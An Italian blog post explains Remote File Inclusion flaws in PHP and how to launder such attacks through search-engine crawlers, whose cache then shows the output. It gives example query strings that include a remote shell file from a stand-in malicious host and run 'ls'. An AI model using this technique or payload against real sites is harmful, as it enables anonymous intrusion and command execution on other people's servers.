Attachi RFI anonimi grazie ai crawler

Un attacco RFI (Remote File Inclusion) sfrutta l’inclusione, senza validazione, di file all’interno di applicativi Web.
Prendendo come esempio http://www.buggedwebsite.com/bugged_page.php?config=page.php, se bugged_page.php includesse il file tramite la variabile $_GET['config'] (o ancora peggio con $config se il Register_global fosse attivo) senza eseguire nessuna verifica sul suo contenuto sarebbe possibile generare url di questo genere ?config=http://www.maliciussite.com/phpshell.txt. In questo modo, sfruttando, un sito esterno sarebbe possibile iniettare nella pagina php in questione qualsiasi tipo di codice.

Questo genere di attacco può essere anonimizzato inserendo la URL, preparata per attaccare l’applicazione da colpire, in una pagina web indicizzata da un qualsiasi motore di ricerca e aspettare che essa venga “letta” da un qualsiasi crawler.
Ad ogni visita il crawler lancierà l’attacco, per conto dell’attaccante, preparato tramite l’URL.
E’ possibile anche usare la cache che i motori di ricerca mantengono per visualizzare i risultati dell’attacco tramite RFI.

Ad esempio ipotizzando di aver preparato una URL contentente questa query string: ?config=http://www.maliciussite.com/phpshell.txt?cmd=ls nella cache del motore di ricerca si troverà il listato dei file contenuti nella stessa directory di bugged_page.php

Questo tipo di attacco è stato recentemente affrontato da SecuriTeam, anche se comparve per la prima volta su PhRack nel 2001.

 

Nessun Commento.. Puoi essere il primo!

Lascia un Commento